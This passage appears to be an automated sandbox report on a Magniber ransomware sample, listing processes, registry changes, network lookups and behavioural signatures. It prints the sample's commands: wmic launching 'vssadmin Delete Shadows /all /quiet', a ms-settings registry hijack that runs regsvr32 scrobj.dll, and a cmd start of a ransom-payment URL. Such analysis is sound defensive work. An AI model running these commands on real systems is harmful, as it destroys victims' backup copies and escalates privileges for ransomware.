PID 2816 wrote to memory of 1144 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2816 wrote to memory of 1144 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2816 wrote to memory of 1144 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1628 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1628 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1628 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1056 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 1056 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 1056 | N/A | C:\Windows\system32\taskhost.exe | C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb^&2^&32792626^&83^&373^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb&2&32792626&83&373&12

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:380 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

Network

Country Destination Domain Proto
US 8.8.8.8:53 34c06a48a400dc40fcuahnpdvb.iecard.top udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 04:21

Reported

2024-12-06 04:24

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (62) files with added filename extension

ransomware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4028 set thread context of 2648 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 4028 set thread context of 2676 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 4028 set thread context of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 4028 set thread context of 3472 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 4028 set thread context of 3640 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 4028 set thread context of 3844 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 4028 set thread context of 3940 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 4028 set thread context of 4008 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 1040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 4028 set thread context of 3512 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 0 N/A C:\Windows\system32\rundll32.exe N/A
PID 4028 set thread context of 2292 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 4764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 4028 set thread context of 1220 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 2496 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 2592 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\taskhostw.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\DllHost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2648 wrote to memory of 2880 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\notepad.exe
PID 2648 wrote to memory of 2880 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\notepad.exe
